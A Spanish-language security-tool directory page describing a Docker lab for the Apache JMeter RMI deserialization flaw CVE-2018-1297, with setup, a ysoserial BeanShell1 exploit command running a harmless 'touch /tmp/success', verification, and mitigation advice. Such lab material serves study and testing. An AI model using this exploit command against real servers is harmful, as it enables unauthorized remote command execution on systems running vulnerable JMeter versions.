Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Jmeter-CVE-2018-1297- — Entorno vulnerable de Apache JMeter RMI en Docker para CVE-2018-1297, deserialización RCE, con comandos de exploit ysoserial, verificación y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/48484848484848/jmeter-cve-2018-1297-
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHub48484848484848/jmeter-cve-2018-1297-

Jmeter-CVE-2018-1297-

Entorno vulnerable de Apache JMeter RMI en Docker para CVE-2018-1297, deserialización RCE, con comandos de exploit ysoserial, verificación y guía de mitigación.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
11hace 2 añosAún no revisado
Compartir

Vulnerabilidad de ejecución de comandos por deserialización RMI en Jmeter (CVE-2018-1297)



Apache JMeter es un conjunto de software de código abierto escrito en Java por la American Apache Software Foundation para pruebas de estrés y rendimiento.
Las versiones 2.x y 3.x tienen una vulnerabilidad de deserialización, que un atacante puede explotar para ejecutar comandos arbitrarios en el servidor objetivo.

Ejecutar el entorno vulnerable:


docker compose up -d

Usé Docker en Kali Linux.

Una vez ejecutado, se inicia el servicio RMI y escucha en el puerto 1099.


Vulnerabilidad:


Utilice ysoserial directamente para explotar la vulnerabilidad.
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'

Ingrese el comando anterior.
Se utilizó la cadena de explotación BeanShell1.

docker compose exec jmeter bash

Al ingresar al contenedor con el comando anterior, se puede ver que '/tmp/success' se ha creado exitosamente.


Resumen


Esta vulnerabilidad explota una falla de RMI (Remote Method Invocation) que puede ocurrir en aplicaciones basadas en Java.
El archivo 'ysoserial-0.0.6-SNAPSHOT-all.jar' utilizado aquí es parte del proyecto ysoserial, que se utiliza para generar cargas útiles que permiten la ejecución remota de código al explotar vulnerabilidades de deserialización de Java.

Esta carga útil tiene como objetivo ejecutar comandos como 'touch /tmp/success', y a través de esta vulnerabilidad, un atacante puede ejecutar comandos arbitrarios o modificar archivos del sistema en el sistema remoto.
Las medidas para mitigar esta vulnerabilidad incluyen la restricción de acceso al servicio RMI, controles de permisos estrictos y el filtrado de serialización de Java.
Descargar herramienta